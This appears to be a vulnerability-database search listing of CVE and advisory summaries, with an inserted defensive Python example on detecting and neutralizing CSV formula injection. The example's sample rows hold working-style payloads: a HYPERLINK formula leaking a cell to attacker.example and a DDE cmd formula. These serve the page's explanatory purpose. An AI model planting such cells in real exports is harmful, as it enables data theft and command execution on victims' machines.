6758 matches found
CVE-2025-8808 xujeff tianti 天梯 com.jeff.tianti.controller save exportOrder CSV injection
A vulnerability was found in xujeff tianti 天梯 up to 2.3. It has been rated as problematic. This issue affects the function exportOrder of the file /tianti-module-admin/user/ajax/save of the component com.jeff.tianti.controller. The manipulation leads to CSV injection. The attack may be initiated...
PT-2025-32482 · Unknown · Xujeff Tianti 天梯
Name of the Vulnerable Software and Affected Versions: xujeff tianti 天梯 versions prior to 2.3 Description: A problematic issue exists in xujeff tianti 天梯. The exportOrder function within the /tianti-module-admin/user/ajax/save file of the com.jeff.tianti.controller component is susceptible to CSV...
Linux Distros Unpatched Vulnerability : CVE-2019-9793
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - A mechanism was discovered that removes some bounds checking for string, array, or typed array accesses if Spectre mitigations have been disabled. This...
tianti security vulnerability
tianti is a lightweight Java CMS solution by the individual developer jeffry. A security vulnerability exists in tianti 2.3 and earlier versions, originating in the function exportOrder of the file /tianti-module-admin/user/ajax/save, resulting in a CSV injection that could lead to a remot...
Linux Distros Unpatched Vulnerability : CVE-2018-19665
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - The Bluetooth subsystem in QEMU mishandles negative values for length variables, leading to memory corruption. CVE-2018-19665 Note that Nessus relies on the...
PT-2025-32423 · Bun +4 · Bun +4
Name of the Vulnerable Software and Affected Versions: oak versions 17.1.5 and below Description: oak is a middleware framework for Deno's native HTTP server, Deno Deploy, Node.js 16.5 and later, Cloudflare Workers and Bun. Specially crafted values in the x-forwarded-proto or x-forwarded-for...
CVE-2025-2028
Lack of TLS validation when downloading a CSV file including mapping from IPs to countries used ONLY for displaying country flags in logs...
CuteFlow security vulnerability
CuteFlow is a web-based document flow and workflow tool from CuteFlow, Inc. A security vulnerability exists in CuteFlow 2.11.2 and earlier versions, stemming from the restartcirculationvalueswrite.php script, which does not validate the type of uploaded files; this could lead to arbitrary file uploads and...
Linux Distros Unpatched Vulnerability : CVE-2025-7783
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Use of Insufficiently Random Values vulnerability in form-data allows HTTP Parameter Pollution (HPP). This vulnerability is associated with program files...
kernel: USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command
In the Linux kernel, the following vulnerability has been resolved: USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command The isd200 sub-driver in usb-storage uses the HEADS and SECTORS values in the ATA ID information to calculate cylinder and head values when creating a CDB for READ o...
Check Point Management Log Server security vulnerability
Check Point Management Log Server is a log server from Check Point (Israel). A security vulnerability exists in Check Point Management Log Server that stems from a lack of TLS validation when downloading CSV files...
CLSA-2025-1754411479 Fix CVE(s): CVE-2025-48384
SECURITY UPDATE: security vulnerability - debian/patches/CVE-2025-48384.patch: quote values containing CR character in config to prevent unintended stripping of CR - CVE-2025-48384...
Malicious Package
Overview epic-fortnite-shared-values is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this...
SUSE-SU-2025:02350-2 Security update for kubernetes1.28
This update for kubernetes1.28 fixes the following issues: - CVE-2025-22872: Properly handle trailing solidus in unquoted attribute value in foreign content bsc1241865...
PYSEC-2025-183
pyjwt v2.10.1 was discovered to contain weak encryption. NOTE: this is disputed by the Supplier because the key length is chosen by the application that uses the library (admittedly, library users may benefit from a minimum value and a mechanism for opting in to strict enforcement)...
CVE-2025-54752
Multiple versions of PowerCMS improperly neutralize formula elements in a CSV file. If a product user creates a malformed entry and a victim user downloads it as a CSV file and opens it in the user's environment, the embedded code may be executed...
Alfasado PowerCMS security vulnerability
Alfasado PowerCMS is a content management system (CMS) from Alfasado (Japan). A security vulnerability exists in Alfasado PowerCMS that stems from improper handling of formula elements in CSV files (CSV injection), which could lead to the execution of embedded code when a victim opens the downloaded file...
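Two of the entries above, the tianti exportOrder issue (CVE-2025-8808) and the PowerCMS CSV export issue (CVE-2025-54752), are the same bug class: user-controlled text is written into a CSV cell unchanged, and a spreadsheet that opens the export evaluates cells beginning with `=`, `+`, `-`, `@` (or a leading tab or carriage return) as formulas. The following is an added example, not code from tianti, PowerCMS or any advisory on this page; the order rows, field names and function names are constructed for illustration. It shows the unsafe export beside the neutralized one, plus an audit routine that flags formula-like cells in an export you already have.

```python
import csv
import io

# Added example, not project code. Leading characters that Excel, LibreOffice Calc
# and Google Sheets treat as the start of a formula when a CSV cell is opened.
FORMULA_PREFIXES = ("=", "+", "-", "@")
# A leading tab or carriage return is also used to smuggle a formula past naive
# prefix checks, so treat those as triggers too.
CONTROL_PREFIXES = ("\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would interpret this cell as a formula.

    Leading spaces are ignored because some importers strip them before parsing.
    """
    stripped = value.lstrip(" ")
    return stripped.startswith(FORMULA_PREFIXES + CONTROL_PREFIXES)


def neutralize_cell(value):
    """Force formula-like text to be stored as text.

    Only strings are touched: a genuine numeric value such as -5 stays numeric,
    so negative numbers in typed columns are not corrupted.
    """
    if isinstance(value, str) and is_formula_like(value):
        # A leading single quote tells the spreadsheet "this is text"; the
        # original content is preserved so the data is still readable.
        return "'" + value
    return value


def export_orders_csv(rows, fieldnames, neutralize=True):
    """Render rows as CSV text.

    neutralize=False reproduces the vulnerable behaviour (raw cells written as-is).
    With neutralize=True every cell goes through neutralize_cell, and QUOTE_ALL
    keeps separators and quotes inside a cell from breaking the row structure.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {k: row.get(k, "") for k in fieldnames}
        if neutralize:
            cells = {k: neutralize_cell(v) for k, v in cells.items()}
        writer.writerow(cells)
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit side: (row, column) pairs whose raw content looks like a formula.

    Row 0 is the header row. Useful for checking an export before it is shared.
    """
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((r, c))
    return hits


# Constructed sample "orders": the customer and note fields are attacker-controlled,
# as they would be when a product user creates a malformed entry.
SAMPLE_ORDERS = [
    {"id": "1001", "customer": "Alice", "note": "gift wrap"},
    {"id": "1002", "customer": '=HYPERLINK("http://attacker.example/?"&A1,"click")', "note": ""},
    {"id": "1003", "customer": "-2+3+cmd|' /C calc'!A0", "note": " @SUM(1,1)"},
]
FIELDS = ["id", "customer", "note"]


if __name__ == "__main__":
    unsafe = export_orders_csv(SAMPLE_ORDERS, FIELDS, neutralize=False)
    safe = export_orders_csv(SAMPLE_ORDERS, FIELDS)
    print("formula-like cells in unsafe export:", find_formula_cells(unsafe))
    print("formula-like cells in safe export:  ", find_formula_cells(safe))
    print(safe)
```

The single-quote prefix is the mitigation OWASP recommends for exports that must stay spreadsheet-friendly; it changes the displayed value, so tell consumers of the export to expect it, or offer a JSON/XLSX export instead for machine consumers. The audit function is the quick check to run over an export pulled from a production system: any hit in a column that holds free text is a cell a victim's spreadsheet would evaluate.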
MAL-2025-6681 Malicious code in epic-fortnite-shared-values (npm)
The package communicates with a domain associated with malicious activity. --- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c1673c5a65d3d81e0cbfe67ef5df8558add71a1993f06838d744058afa38e3ce Any computer that has this package installed or running should be considered...
A vulnerability in the CSV file processor of the Django web development platform allows an attacker to execute arbitrary code.
The vulnerability in the CSV file processor of the Django web application development platform is caused by an improper limitation of a pathname to a restricted directory. Exploiting this vulnerability allows a malicious actor to inject arbitrary code by placing it in a specially crafted CSV...